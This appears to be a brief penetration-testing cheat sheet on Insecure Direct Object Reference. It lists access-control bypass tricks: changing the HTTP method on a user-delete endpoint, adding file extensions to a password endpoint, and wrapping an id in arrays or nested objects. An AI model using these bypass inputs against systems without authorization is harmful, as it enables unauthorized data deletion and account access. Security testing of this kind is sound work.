Insecure Direct Object Reference (IDOR)
Change HTTP method
GET /users/delete/123 -> 403
POST /users/delete/123 -> 200Change file extension
#Endpoint found
/users/password -> 401
#Endpoints to test
/users/password.json
/users/password.xmlConvert request body
#Original body
{"id":1}
#Bypasses
{"id":[1]}
{"id":{"id":1}}Test wildcards
Check another version
Missing Function Level Access Control (MFLAC)
Path Traversal Secondary Context
HTTP Parameter Pollution
References
Last updated